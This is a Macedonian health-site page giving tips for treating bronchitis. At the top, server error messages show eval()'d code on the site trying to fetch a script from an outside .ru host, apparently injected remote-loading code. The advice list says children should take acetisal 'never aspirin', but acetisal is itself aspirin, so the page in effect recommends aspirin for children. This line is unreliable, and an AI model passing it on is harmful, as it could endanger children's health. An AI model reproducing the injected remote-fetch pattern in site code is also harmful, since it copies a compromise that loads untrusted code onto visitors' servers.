Здравствен совет - Лекување на бронхитис | За Здравје


Error message

  • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
  • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).

Здравствен совет - Лекување на бронхитис

 

Бронхитисот е вирусна или бактериска инфекција која што предизвикува воспаление на дишните патишта и тешко дишење.

 

Националниот институт за срце, бели дробови и крв од САД ги предложува следните чекори за лекување на бронхитисот:

 

- Одмарајте се и консумирајте големи количини течности.

 

- Во случај да имате треска, кај возрасните се препорачува земање на аспирин, додека кај децата ацетисал (никако аспирин).

 

 

- Ако докторот се сомнева на бактериска инфекција, може да се препише антибиотик. Сепак, антибиотикот нема да помогне при вирусна инфекција која што е и најчест предизвикувач на бронхитисот.

 

- За да се отворат дишните патишта, во собата поставете навлажнувач на воздухот.

 

- Ако одобри докторот, земете лекарства против кашлица и воспаление.

 

- Избегнете изложување во средини кои што ги иритираат белите дробови како што е чадот од цигари.

ЗА ЗДРАВЈЕ NEWSLETTER